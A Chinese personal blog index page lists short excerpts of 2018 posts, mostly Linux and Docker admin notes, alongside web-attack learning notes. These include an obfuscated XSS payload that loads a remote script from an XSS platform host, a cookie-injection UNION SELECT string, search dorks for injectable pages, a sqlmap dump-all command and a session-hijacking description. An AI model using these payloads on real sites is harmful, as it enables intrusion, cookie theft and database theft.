- 博客(37)
- 资源 (10)
- 问答 (5)
- 收藏
- 关注
RSS订阅原创 vitualenv
在开发Python应用程序的时候,系统安装的Python3只有一个版本:3.4。所有第三方的包都会被pip安装到Python3的site-packages目录下。如果我们要同时开发多个应用程序,那这些应用程序都会共用一个Python,就是安装在系统的Python 3。如果应用A需要jinja 2.7,而应用B需要jinja 2.6怎么办?这种情况下,每个应用可能需要各自拥有一套“独立”的P...
2018-12-27 13:55:08
122
转载 配置ssh互信
一、known_hsots ssh会把你每个你访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts。当下次访问相同计算机时,OpenSSH会核对公钥。如果公钥不同,OpenSSH会发出警告, 避免你受到DNS Hijack之类的攻击。我在上面列出的情况,就是这种情况。原因:一台主机上有多个Linux系统,会经常切换,那么这些系统使用同一ip,登录过一次后就会...
2018-12-27 10:54:25
953
原创 查看某个软件的部署情况
rpm -qa ansible | less /etc/ansible/etc/ansible/ansible.cfg/etc/ansible/hosts/etc/ansible/roles/usr/bin/ansible/usr/bin/ansible-2/usr/bin/ansible-2.7/usr/bin/ansible-config/usr/bin/ansible...
2018-12-27 09:46:22
439
转载 docker centos 7 无法启动
此台机器为香港服务器,为的是方便快速pull公共镜像,之前作为kubernetes集群之一。后因种种原因,此机器退出集群。之后再用到docker时,发现docker启动不了了,查看报错如下:[root@ALY-HKC-PRO-001 ~]# systemctl restart dockerJob for docker.service failed because the control ...
2018-12-26 18:00:39
512
转载 yum源配置 以及docker 安装报错 container-selinux >= 2.9 解决
Error: Package: docker-ce-18.03.1.ce-1.el7.centos.x86_64 (docker-ce-edge) Requires: container-selinux >= 2.9 You could try using --skip-broken to work around the problem You could try ...
2018-12-26 17:30:27
3829
1
转载 docker部署
前提是先翻墙 最近比较有空,大四出来实习几个月了,作为实习狗的我,被叫去研究Docker了,汗汗!Docker的三大核心概念:镜像、容器、仓库镜像:类似虚拟机的镜像、用俗话说就是安装文件。容器:类似一个轻量级的沙箱,容器是从镜像创建应用运行实例,可以将其启动、开始、停止、删除、而这些容器都是相互隔离、互不可见的。仓库:类似代码仓库,是Docker集中存放镜像文件的场所。...
2018-12-26 15:03:18
123
转载 ftp允许root登陆
1.编辑/etc/vsftpd/user_list和/etc/vsftpd/ftpusers两个设置文件脚本,将root账户前加上#号变为注释。(即让root账户从禁止登录的用户列表中排除) 2.重新开启vsftpd service vsftpd reload 允许root账户访问ftp,可以远程访问centos系统中的任一文件,对于远程维护centos系统或下载文件十分方便。...
2018-12-26 09:45:50
5332
转载 python实现遍历目录
1. 基本实现 [root@localhost ~]# cat dirfile.pyimport ospath='/tmp'for dirpath,dirnames,filenames in os.walk(path): for file in filenames: fullpath=os.path.join(dirpath,file) ...
2018-12-26 09:15:06
341
原创 epel源究竟是什么
EPEL (Extra Packages for Enterprise Linux)是基于Fedora的一个项目,为“红帽系”的操作系统提供额外的软件包,适用于RHEL、CentOS和Scientific Linux.使用很简单:1. 首先我们需要安装一个叫”epel-release”的软件包,这个软件包会自动配置yum的软件仓库。当然你也可以不安装这个包,自己配置软件仓库也是一样的。#...
2018-12-24 10:50:00
5567
原创 CentOS 7下YUM 本地仓库的搭建详细步骤
使用CentOS7.iso 搭建本地仓库(1) 将CentOS7.iso文件拷贝到用户主目录中 即:~? 1 cp CentOS7.iso ~ (2) 创建iso文件将要挂在的目录? 1 mkdir -p /mnt/cdrom (3) 挂在iso文件到刚刚创建的目录中? 1 ...
2018-12-24 10:47:07
1290
原创 sed总结
https://www.cnblogs.com/liwei0526vip/p/5644163.htmlhttps://www.cnblogs.com/ginvip/p/6376049.htmlhttps://wenku.baidu.com/view/f836d988d0d233d4b14e69a7.html 1 sed修改ip地址sed -i '/^ONBOOT=/c\ONBOOT...
2018-12-24 09:40:41
431
原创 js正则表达式
RegExp两种创建方式 (1)直接量 (2)new RegExp();个人推荐用直接量var reg=/abc/; 用反斜杠夹住var str="abcd\"edf";var reg=/abc/;reg.test(str); 返回true 检测str中是否有reg所限定的字符或者var str="abcd\"edf";var reg=/abc/...
2018-12-24 09:38:27
104
原创 xss脚本绕过waf
<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0ZweWpnUz8nK01hdGgucmFuZG9tKCk='))> atob解密后是真正的js代码...
2018-12-22 18:33:55
990
原创 html转义字符
先看转义字符百科https://baike.baidu.com/item/%E8%BD%AC%E4%B9%89%E5%AD%97%E7%AC%A6/86397?fr=aladdin然后看html转义字符对照表http://tool.oschina.net/commons?type=2
2018-12-22 14:04:46
2713
原创 原来html的转义字符只能显示不能作为代码执行
<!DOCTYPE html><html><head> <title></title></head><body>&#60&#115&#99&#114&#105&#112&#116&
2018-12-22 14:03:38
1444
原创 apache配置限制后台登陆的地址为某个地址
<Directory "E:/phpstudy/PHPTutorial/WWW/abc"> #你想限制访问的后台目录Order deny,allowallow from 172.29.120.48 #只允许这个IP访问***后台目录,多个IP用空格隔开deny from all</Directory> ...
2018-12-21 09:21:24
980
1
原创 csrf和xss的区别
csrf是不获取用户的cookie的,而xss是获取用户cookie的,从这一点,csrf更容易入侵。csrf是让用户自己访问黑客发送的链接
2018-12-20 08:55:08
1262
2
原创 伪造session
例如A用户登陆了一个网站http://www.****.net/public/index/user/index_logined他的session id再cookie文件里保存 PHPSESSID=8ij3rq9ts56rb51d3859a3jeq6 然后B用户通过csrf截获了PHPSESSID=8ij3rq9ts56rb51d3859a3jeq6这个cookie然后在浏览器...
2018-12-19 15:45:23
4486
原创 转义字符的理解
转义字符是根据语境来的在百度百科里有这个 但是实际上用js语言输出的时候document.write("'")可以打印出'document.write("\'")也可以打印出',因为这种情况下'没有歧义但是如果document.write(''')会报错但是如果document.write('\'')既可以打印出'这充分说明\的作用要根据语境 另外有些空格在...
2018-12-18 14:06:51
401
原创 百度和谷歌获取注入点
在百度输入inurl:index.php?id=1谷歌输入filetype:index.php?id=1谷歌对某个站点进行注入搜索Site:www.somesite.com filetype:asp
2018-12-18 11:58:17
772
原创 基于get的xss注入
abc.php<?php$servername = "localhost";$username = "root";$password = "root";$dbname = "test"; // 创建连接$conn = new mysqli($servername, $username, $password, $dbname);// 检测连接if ($conn->...
2018-12-17 19:43:48
752
原创 sqlmap爆破post数据
把burpsuite截获的数据包存放到sqlmap本地目录中python sqlmap.py -r "abc.txt" --batch --dump-all --dump-all 爆破所有
2018-12-17 14:01:19
1431
原创 使用FireFox插件RESTClient工具POST方法?
贴出php代码<html><body><?php$con = mysql_connect("localhost","root","root");if (!$con) { die('Could not connect: ' . mysql_error()); }else{ mysql_select_db("test");
2018-12-17 10:33:32
612
原创 mod header中的cookie注入如何加and1=2
添加cookie头字段,值设置为id=171+and+(1=2)+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
2018-12-12 17:27:07
1224
原创 有关access数据库sql注入的问题
设计一个access 数据库如下 如果用这个语句SELECT *FROM 表1 where id=1 union select 1,2,3;会报错 如果改成这样SELECT *FROM 表1 where id=1 union select 1,2,3 from 表1;则没问题而且结果如下发现 1,2,3是放在前面的再改成这样SELECT *FRO...
2018-12-12 17:09:35
523
原创 http协议
HTTP简介HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件, 查询结果等)。HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的方式,适用于分布式超媒体信息系...
2018-12-12 12:03:15
174
原创 空格在urlcode中的问题
1 浏览器自动编码在浏览器输入 http://localhost/urldecode.php?a=1&b=2 1浏览器自动转换为http://localhost/urldecode.php?a=1&b=2%201无论在urldecode.php解码也好不解码也好,都是显示空格不会显示%20 <?phpecho 'a:'.$_GET['a'];ec...
2018-12-11 14:07:54
436
原创 js和php的url编码
写一个urlcode.html的文件如下<!DOCTYPE html><html><head> <title></title></head><body><script type="text/javascript"> var url2=
2018-12-11 09:18:27
698
原创 mysql 使用存储过程定期插入一定的数据
delimiter $$create procedure insertyonghu2()begindeclare i varchar(20);declare j varchar(20);declare x int;set x=50;set i = 'li';set j='xiaotong';while x <70 doinsert into yonghu(password...
2018-12-09 08:56:46
304
原创 mysql 存储过程
新建查询delimiter $$create procedure show_user()beginselect * from user;end$$delimiter ; 新建查询call show_user();
2018-12-08 13:15:29
71
九优seo综合版v3.6(百度360排名点击,网站文章后台自动更新)
2018-03-05
TA创建的收藏夹 TA关注的收藏夹
TA关注的人